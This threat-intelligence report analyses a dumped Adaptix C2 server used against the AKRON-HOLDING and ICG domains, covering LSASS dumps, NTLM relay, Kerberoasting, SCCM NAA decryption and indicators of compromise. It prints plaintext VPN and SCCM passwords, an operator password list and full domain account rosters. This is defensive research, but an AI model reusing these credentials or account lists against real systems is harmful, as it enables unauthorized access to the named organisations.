Inside an Adaptix C2 Server: Full Forensic Dump of an Active APT Engagement Against "AKRON-HOLDING" and ICG

Published: 2026-03-08 Tags: threat-intelligence, C2-forensics, Adaptix, credential-harvesting, LSASS, NTLM, Kerberoasting, SCCM, DPAPI, lateral-movement, APT TLP: WHITE (credential material redacted where appropriate)

---

TL;DR

We obtained a full forensic dump from an Adaptix C2 server that was actively managing an intrusion into at least two Active Directory domains -- AKRON-HOLDING and ICG (internal domain icg.stf). The dump contains LSASS memory extraction results from multiple workstations, NTLMv2 hashes for 20+ accounts, Kerberoastable SPN hashes for the svc-sql service account, plaintext VPN credentials, SCCM Network Access Account passwords decrypted via DPAPI, a full domain user enumeration, and a reverse-engineered supply chain attack (scannerlib_poison) executed against the operator's own Kali box.

---

1. The C2 Framework: Adaptix v0.4 to v1.0

The server was running Adaptix Framework, an open-source post-exploitation C2 written in Go. The recovered logs show two distinct runtime sessions:

First Session (v0.4) -- February 20, 2026 17:11 UTC

[===== Adaptix Framework v0.4 =====]
[+] Starting server -> https://0.0.0.0:4321/profile
[*] Restore data from Database...
   [+] Restored 3 agents
   Started listener: https://10.127.196.102:443
   Started listener: https://192.168.10.222:443

The v0.4 instance loaded with Extension-Kit BOFs (Beacon Object Files) but every module failed parsing due to a missing extender_type field -- indicating the operator was running an incompatible version of the Extension-Kit. The modules attempted include:

• Process-BOF -- Process enumeration/manipulation
• LateralMovement-BOF -- Lateral movement primitives
• Elevation-BOF -- Privilege escalation
• Injection-BOF -- Process injection
• AD-BOF -- Active Directory reconnaissance
• Kerbeus-BOF -- Kerberos ticket manipulation
• Creds-BOF -- Credential harvesting
• SAR-BOF / SAL-BOF -- Security audit modules

Two HTTPS listeners were configured but both failed to bind (address already in use), suggesting another service or a previous C2 instance was already occupying port 443.

Second Session (v1.0) -- February 20, 2026 21:37 UTC

[===== Adaptix Framework v1.0 =====]
[+] Starting server -> https://0.0.0.0:4321/endpoint
   [+] Restored 5 agents
   [+] Restored 1 targets
   Started listener: http://10.127.196.102:443
   Started TCP listener: 10.127.196.102:4444

The upgrade to v1.0 resolved the Extension-Kit issues. The agent count grew from 3 to 5, a target was established, and a raw TCP listener appeared on port 4444 (named Standoff_all). The listener name is notable -- Standoff is a well-known red team competition platform, suggesting this may be operational tooling adapted from a CTF environment, or conversely, a real intrusion conducted by operators who hone their skills in Standoff events.

A TLS handshake error from 10.124.2.26 on February 20 at 23:51 indicates an agent or scanner probing the C2 over HTTPS, receiving an unexpected response. By February 26, two agents (4f10e251 and 5adfda44) went missing -- possibly detected and remediated, or the implants timed out.

---

2. Target Environment: Two Domains, One Kill Chain

The artifacts reveal operations spanning two distinct Active Directory domains:

Domain: AKRON-HOLDING

This domain appears in all NTLMv2 hash captures. Machine accounts from this domain include:

Machine Account	Significance
PKI-CES$	PKI Certificate Enrollment Service -- indicates an enterprise PKI infrastructure
S001-N031$	Naming convention suggests standardized workstation deployment (Site 001, Node 031)
S083-A025$	Different site prefix -- multi-site organization
S999-S212$	High site number -- possibly a test/staging environment
WAS-AP79$	Web Application Server -- infrastructure host

User accounts captured authenticating across this domain:

• marin_ai -- 20+ NTLMv2 challenge/response captures, the most heavily targeted account. Authenticated via both CIFS (cifs/10.103.197.80) and HTTP (HTTP/10.103.197.80) to the same relay target.
• konovalov_ii -- Multiple captures with NTLMv2 authentication, including NTLMv2 SSP (Session Security Provider) responses indicating a more complex authentication scenario.

The relay target 10.103.197.80 was used for both CIFS and HTTP NTLM relay attacks, suggesting the operator set up an NTLM relay/responder at this address.

Domain: ICG (icg.stf)

The internal domain icg.stf yielded far richer results. The full domain user list reveals a mid-size enterprise:

Administrative Accounts (9 total):

kamacho              -- Standalone admin (no _admin suffix, likely original)
r_thompson_admin     -- Admin tier for R. Thompson
j_hernandez_admin    -- Admin tier for J. Hernandez
c_thomas_admin       -- Admin tier for C. Thomas
l_miller_admin       -- Admin tier for L. Miller
d_dimos_admin        -- Admin tier for D. Dimos
r_gnop_admin         -- Admin tier for R. Gnop
kirill               -- Standalone admin (no naming convention)
ConfigMgrNAA         -- SCCM Network Access Account (privileged)

The naming convention (firstname_lastname + _admin suffix for privileged accounts) is textbook Microsoft tiered administration. The presence of kamacho and kirill as standalone accounts without the _admin suffix breaks the pattern -- these are likely either the original domain admin accounts or accounts created outside of the standard provisioning process.

Service Accounts:

svc-sql       -- SQL Server service (Kerberoastable)
exchange      -- Exchange Server
edr           -- EDR management account
vpn           -- VPN service account
ptdadmin      -- PatchTuesday/WSUS admin
ConfigMgrNAA  -- SCCM Network Access Account

Standard Users (16 total):

c_allen, c_stein, d_jones, g_miller, j_avila, j_hernandez,
j_pineda, k_stome, l_miller, l_nichols, m_campbell, r_horse,
r_jones, r_thompson, s_barrett, engineer

---

3. Credential Harvesting: A Masterclass in Post-Exploitation

3.1 LSASS Memory Dumps

The LSASS results file contains structured output from automated credential extraction across four workstations in the ICG domain. Each dump followed the same pattern: minidump to C:\ProgramData\d.dmp, extract cached logons, enumerate local users, pull credential vaults, and harvest PowerShell history.

Workstation: LMILLER

• Minidump: 54,696,223 bytes -- extracted to C:\ProgramData\d.dmp
• Active NTLM sessions from icg\engineer (5 concurrent network logons)
• Local ptadmin account with network logon session
• Local users: Administrator, L_Miller_local, ptadmin, WDAGUtilityAccount
• Vault contained credential for WindowsLive:target=virtualapp/didlogical
• PowerShell History (Administrator): Get-FileHash C:\Users\L_Miller\Desktop\dnsmaster
• PowerShell History (ConfigMgrNAA): Extensive reconnaissance -- navigated to .ssh, read known_hosts, downloaded PowerView.ps1 from GitHub (lucky-luk3/ActiveDirectory), enumerated the engineer account's SID

The ConfigMgrNAA PowerShell history on LMILLER is particularly revealing. The operator:

1. Used the SCCM NAA account to navigate to L_Miller's .ssh directory and read known_hosts
2. Downloaded PowerView.ps1 (AD enumeration tool) from a non-standard GitHub fork (lucky-luk3/ActiveDirectory)
3. Ran Get-NetUser -Username engineer to enumerate the engineer service account
4. Attempted to extract the binary SID of the engineer account -- likely for constructing a Silver Ticket

Workstation: RTHOMPSON

• Minidump: 54,777,983 bytes
• Same pattern: 5x icg\engineer network sessions, local ptadmin
• Local users: Administrator, R_Thompson_local, ptadmin, WDAGUtilityAccount
• No interesting PowerShell history recovered

Workstation: JHERNANDEZ

• Minidump: 54,778,031 bytes
• Same pattern: 5x icg\engineer network sessions, local ptadmin
• Local users: Administrator, J_Hernandez_local, ptadmin, WDAGUtilityAccount

Workstation: CTHOMAS

• Minidump: 54,851,839 bytes
• 5x icg\engineer network sessions, local ptadmin
• Local users: Administrator, C_Thomas_local, ptadmin, WDAGUtilityAccount
• PowerShell History (Administrator): Get-FileHash C:\Users\C_Thomas\Desktop\dnsmaster and Reset-ComputerMachinePassword -Credential Get-Credential
• PowerShell History (ConfigMgrNAA): Navigated to C_Thomas/.ssh and read known_hosts
• PowerShell History (C_Thomas): Get-FileHash C:\Users\C_Thomas\Desktop\dnsmaster

The dnsmaster file appearing on multiple users' desktops across workstations suggests either a staging payload or a domain management tool being distributed.

Key Pattern: The ptadmin Backdoor

Every compromised workstation has a local ptadmin account with network logon sessions. This account is not a standard Windows default. Combined with the ptdadmin domain account, this appears to be a persistence mechanism -- a local admin account deployed to every machine, likely through Group Policy or SCCM task sequences.

Key Pattern: The engineer Account

The icg\engineer account has 5 concurrent NTLM network authentication sessions on every dumped workstation. This isn't normal user behavior -- it's consistent with an automated service or a compromised account being used for lateral movement across the domain. The operator also harvested VPN credentials for this exact account (see below).

3.2 WinRM Lateral Movement Attempts

The operator attempted WinRM-based lateral movement from both LMILLER and CTHOMAS to a backup server:

WINRM_backup.icg.stf_icg\ConfigMgrNAA: FAIL
WINRM_backup.icg.stf_icg\engineer: FAIL
WINRM_backup_icg\ConfigMgrNAA: FAIL
WINRM_10.154.21.66_icg\ConfigMgrNAA: FAIL
WINRM_10.154.21.66_icg\engineer: FAIL
WINRM_SYSTEM_backup.icg.stf: FAIL
WINRM_SYSTEM_10.154.21.66: FAIL

All WinRM connections to the backup server (backup.icg.stf / 10.154.21.66) failed -- with both the ConfigMgrNAA and engineer accounts, and even SYSTEM authentication. The backup server appears to have WinRM either disabled or locked down, which is appropriate hardening. LAPS queries (LAPS_OLD, LAPS_NEW, LAPS_ENC) also returned empty -- LAPS may not be deployed or the operator lacked read permissions for LAPS attributes.

3.3 SCCM Network Access Account Decryption

The most operationally significant credential recovery came from DPAPI-protected SCCM policy secrets. From both LMILLER and JRAMIREZ workstations, the operator extracted and decrypted the SCCM Network Access Account:

NetworkAccessUsername_DECRYPTED: icg\ConfigMgrNAA
NetworkAccessPassword_DECRYPTED: sdafasdfsadf2342532SDF!@!DF03

This is a well-known attack path. The SCCM NAA credential is pushed to all managed clients and protected by DPAPI. With local admin on any SCCM-managed machine, an attacker can decrypt this secret. The password sdafasdfsadf2342532SDF!@!DF03 appears to be a keyboard-mash password -- superficially complex but created by randomly hitting keys rather than generated by a password manager.

This credential also appears in the dev_passwords.md artifact, confirming it was successfully recovered and added to the operator's password list.

3.4 VPN Credentials

Two sets of VPN credentials were recovered:

Username	Password	Source
engineer	iSn(wXB.$DeLO1V[k+zm	vpn_creds.md, icg_vpn_auth.md
support	DblfYjZABjbzkUR	vpn_creds2.md

The engineer VPN credential appeared in two separate artifact files (vpn_creds.md and icg_vpn_auth.md), and this is the same account that maintains persistent NTLM sessions across all compromised workstations. This account likely serves as the primary persistence mechanism -- VPN in, authenticate everywhere.

3.5 NTLMv2 Hash Collection

The all_hashes.md file contains 36 NTLMv2 challenge/response pairs captured via NTLM relay or responder. The hashes target the SMB share cifs/10.103.197.80 and HTTP endpoint HTTP/10.103.197.80:

• PKI-CES$ (1 hash) -- The PKI Certificate Enrollment Server machine account
• S001-N031$ (7 hashes) -- Repeated captures from the same workstation
• WAS-AP79$ (1 hash) -- Web application server
• marin_ai (20 hashes) -- Heavy targeting via both CIFS and HTTP relay
• konovalov_ii (4 hashes) -- Targeted via both CIFS and HTTP relay
• S083-A025$ (1 hash) -- Workstation from a different site
• S999-S212$ (1 hash) -- Possible staging environment workstation

The volume of marin_ai captures (20 hashes) suggests either a persistent responder/relay running against this user's traffic, or repeated coercion attacks (e.g., via malicious shortcuts, SCF files, or print spooler abuse).

3.6 Kerberoasting: svc-sql

The svc_sql_hash.md and all_spn.hashes files contain Kerberos TGS-REP hashes for the svc-sql service account:

$krb5tgs$23$*svc-sql$ICG.STF$icg.stf/svc-sql*$...

This is a standard Kerberoasting attack -- requesting a TGS ticket for the SQL Server service principal (icg.stf/svc-sql) and attempting offline cracking. The hash uses RC4 encryption ($23$), meaning the domain has not enforced AES-only Kerberos -- a common hardening gap. If the svc-sql password is weak, offline cracking with hashcat mode 13100 would yield the plaintext.

---

4. The Operator's Dev Environment: Password Arsenal

The dev_passwords.md file reveals the operator's accumulated credential collection:

ycL4PBvua2GhBRkJ          -- Generated/recovered password
sdafasdfsadf2342532SDF!@!DF03  -- SCCM NAA (confirmed decrypted)
Y+BtA0j5JMlw5fb           -- Generated/recovered password
blue1388                   -- Weak pattern password
grey7732                   -- Weak pattern password
P3nt3st2026!               -- Likely the operator's OWN password (pentest-themed)
Init123                    -- Default/initial password
admin                      -- Default credential
password                   -- Default credential

The password P3nt3st2026! stands out -- it follows the pattern of a pentest team password (year-suffixed, leetspeak), strongly suggesting the operator is from a professional penetration testing or red team background. This aligns with the Standoff competition reference in the C2 listener naming.

The dev_users.md file lists a separate user roster that includes teamcity and gitlab service accounts alongside user accounts with _admin suffix variants (h_moreno_admin, j_owens_admin). This appears to be a different target environment or an expanded scope beyond the ICG/AKRON-HOLDING domains -- possibly a development/CI-CD infrastructure.

---

5. Supply Chain Compromise: The scannerlib_poison

One of the most interesting artifacts is scannerlib_exfil.md -- it contains data exfiltrated from the operator's own Kali machine via a poisoned Python library:

=== HOSTNAME ===
kali
PWD=/tmp/scannerlib_poison
SSH_CLIENT=1.1.1.13 63881 22
SSH_CONNECTION=1.1.1.13 63881 192.168.10.222 22
USER=kali

The operator's Kali box (192.168.10.222) was compromised through a supply chain attack on a Python package called scannerlib_poison, executed from /tmp/scannerlib_poison. The attacker (or a rival team in a competition context) SSH'd in from 1.1.1.13 and ran the poisoned library, which exfiltrated:

• Full environment variables
• User identity (uid=1000(kali))
• All git repositories on the system
• SSH key locations (/home/kali/.ssh/id_rsa)
• pip configuration
• GitLab tokens

The git repository enumeration reveals the operator's toolkit:

Repository	Purpose
/tmp/sccmhunter	SCCM exploitation toolkit
/tmp/doc-macro-exploit	Office macro payload generation
/tmp/eviloffice	Malicious Office document creation
/tmp/follina	CVE-2022-30190 (Follina) exploit
/tmp/macro_reverse_shell	Macro-based reverse shell
/tmp/phuip-fpizdam	PHP-FPM RCE exploit (CVE-2019-11043)
/tmp/check_bitrix	Bitrix CMS vulnerability scanner
/tmp/bitrix-exploit	Bitrix CMS exploitation
/tmp/PassTheCert	AD CS certificate abuse tool
/mnt/sda/opt/impacket	Impacket suite (AD attack tools)
/home/kali/BloodHound	AD attack path mapping
/home/kali/CVE-2020-1472	ZeroLogon exploit
/home/kali/SharpRDP	Lateral movement via RDP
/home/kali/10.3.3.42/lib_mysqludf_sys	MySQL UDF privilege escalation
/home/kali/10.3.3.42/CVE-2019-19576	Specific target exploit
/home/kali/10.1.1.27/Apache-Vulns	Apache vulnerability exploitation
/home/kali/10.11.1.251/Wordpress-XMLRPC-Brute-Force-Exploit	WordPress brute force

The directory structure (/home/kali/10.3.3.42/, /home/kali/10.1.1.27/, /home/kali/10.11.1.251/) shows target-organized exploitation -- each IP gets its own directory with relevant exploits. This is a structured, methodical operator.

The squid_loot.md artifact shows a test of an HTTP exfiltration proxy:

[2026-03-07 01:36:25] FROM=127.0.0.1 UA=curl/8.15.0 RAW=LOCAL_TEST DECODED=LOCAL_TEST

This was a local test on March 7, 2026 -- the most recent timestamp in the dump -- indicating the operator was actively developing or testing exfiltration infrastructure through a Squid proxy.

---

6. Network Topology

The alive hosts scan reveals the target network spans multiple subnets:

Subnet	Host Count	Likely Function
5.63.128.0/22	8 hosts	External-facing infrastructure
109.105.128.0/17	50 hosts	Core enterprise network
109.105.131.x	7 hosts	Server cluster
109.105.133.x	7 hosts	Server cluster
109.105.144.x	4 hosts	Network infrastructure
109.105.145.x	13 hosts	Largest workstation pool
109.105.147.x	4 hosts	Secondary workstation pool
109.105.140.1	1 host	Gateway/router

The C2's internal listener addresses (10.127.196.102 and 192.168.10.222) place the operator's infrastructure in RFC 1918 space -- consistent with a VPN'd-in attack position or an internal pivot host.

Key internal addresses from the LSASS dumps:

• backup.icg.stf / 10.154.21.66 -- Backup server (WinRM hardened)
• 10.103.197.80 -- NTLM relay/responder position

---

7. Attack Chain Reconstruction

Based on the forensic artifacts, the full kill chain can be reconstructed:

1. Initial Access
   └── VPN authentication as "engineer" (iSn(wXB.$DeLO1V[k+zm)
       └── Or "support" (DblfYjZABjbzkUR)

2. C2 Establishment
   └── Adaptix v0.4 → v1.0 on 10.127.196.102:443
       └── 5 agents deployed across ICG domain

3. Credential Access
   ├── NTLM Relay at 10.103.197.80 → 36 NTLMv2 hashes
   ├── LSASS dump on LMILLER, RTHOMPSON, JHERNANDEZ, CTHOMAS
   ├── SCCM NAA decryption → icg\ConfigMgrNAA / sdafasdfsadf2342532SDF!@!DF03
   ├── Kerberoasting → svc-sql TGS hash (RC4)
   └── DPAPI credential extraction (attempted)

4. Reconnaissance
   ├── Full domain user enumeration (33 accounts)
   ├── Admin account identification (9 privileged accounts)
   ├── PowerView.ps1 from GitHub → AD enumeration
   ├── BloodHound → attack path mapping
   └── Alive host scanning (58 hosts across 7+ subnets)

5. Lateral Movement
   ├── WinRM attempts to backup.icg.stf (FAILED)
   ├── engineer account NTLM sessions on 4+ workstations
   └── ConfigMgrNAA account used for remote enumeration

6. Persistence
   ├── ptadmin local account on all workstations
   ├── VPN credentials for re-entry
   └── 5 Adaptix agents with database persistence

---

8. Indicators of Compromise

Network Infrastructure

Indicator	Type	Context
10.127.196.102	Internal IP	Adaptix C2 listener (HTTPS/443, TCP/4444)
192.168.10.222	Internal IP	Adaptix C2 secondary listener / Kali box
10.103.197.80	Internal IP	NTLM relay/responder position
10.154.21.66	Internal IP	Targeted backup server (backup.icg.stf)
10.124.2.26	Internal IP	Probed the C2 (TLS handshake error)
1.1.1.13	External IP	SSH source for scannerlib_poison attack
0.0.0.0:4321	Service	Adaptix C2 management port

C2 Signatures

Indicator	Type	Context
/profile	URI path	Adaptix v0.4 C2 endpoint
/endpoint	URI path	Adaptix v1.0 C2 endpoint
Adaptix Framework v0.4	Banner	C2 version identifier
Adaptix Framework v1.0	Banner	C2 version identifier
Extension-Kit	Directory	Adaptix BOF module path

Accounts (Compromised / Operator-Created)

Account	Domain	Type
engineer	ICG	Compromised VPN/domain account
support	ICG	Compromised VPN account
ConfigMgrNAA	ICG	SCCM NAA (password recovered)
svc-sql	ICG	Kerberoasted service account
ptadmin	Local	Persistence account on workstations
marin_ai	AKRON-HOLDING	Heavily targeted user
konovalov_ii	AKRON-HOLDING	Targeted user

File Artifacts

Indicator	Type	Context
C:\ProgramData\d.dmp	File path	LSASS minidump staging location
dnsmaster	File name	Unknown payload on multiple user desktops
/tmp/scannerlib_poison	Directory	Supply chain attack working directory
revshell_header.bin	Binary (84,992 bytes)	Reverse shell payload header
PW.ps1	File name	PowerView.ps1 renamed

Tools & Techniques (MITRE ATT&CK)

Technique	ID	Evidence
External Remote Services	T1133	VPN access with stolen credentials
Command and Scripting Interpreter: PowerShell	T1059.001	PowerView, Get-FileHash, SCCM NAA decryption
OS Credential Dumping: LSASS Memory	T1003.001	Minidumps on 4 workstations
Steal or Forge Kerberos Tickets: Kerberoasting	T1558.003	svc-sql TGS hash extraction
Unsecured Credentials: DPAPI	T1555.004	SCCM NAA credential decryption
Account Discovery: Domain Account	T1087.002	Full domain user enumeration
Remote Services: WinRM	T1021.006	Lateral movement attempts
NTLM Relay	T1557.001	36 NTLMv2 captures via relay
Valid Accounts: Domain Accounts	T1078.002	engineer, ConfigMgrNAA reuse
Supply Chain Compromise	T1195.002	scannerlib_poison on operator Kali

---

9. Analyst Assessment

This dump represents a mature, multi-phase intrusion by an operator (or team) with deep Active Directory expertise. Several characteristics stand out:

Professional tradecraft: The structured directory organization on the Kali box (/home/kali/<target-IP>/), the methodical credential collection, and the use of Adaptix (a less common C2 compared to Cobalt Strike or Sliver) all point to an experienced operator who prefers lower-profile tooling.

Competition crossover: The Standoff listener name and the P3nt3st2026! password strongly suggest the operator participates in professional red team competitions. Whether this dump represents a competition engagement or real-world intrusion is an open question -- the infrastructure scale (58 alive hosts, PKI, SCCM, Exchange) is consistent with either a large enterprise or a well-built competition lab.

Operational security failure: The scannerlib_poison compromise of the operator's own Kali machine is the most operationally interesting finding. Another team (or a defender running a counter-offensive) managed to execute a supply chain attack against the operator's toolchain, exfiltrating their environment, SSH keys, and git repository structure. The attacker became the attacked.

Defensive gaps in the target environment: The ICG domain exhibits several hardening failures that enabled this intrusion:

• SCCM NAA credentials recoverable via DPAPI on any managed endpoint
• No AES-only enforcement for Kerberos (RC4 Kerberoasting possible)
• Shared ptadmin local account across all workstations (no LAPS rotation observed)
• The engineer account appears to be a shared/service credential used across all workstations via NTLM
• WinRM was the only observed hardened service (blocked on the backup server)

---

breakglass.intelligence -- Threat research and adversary tradecraft analysis. This report is based on forensic artifacts recovered from exposed C2 infrastructure. All credential material is presented for defensive awareness.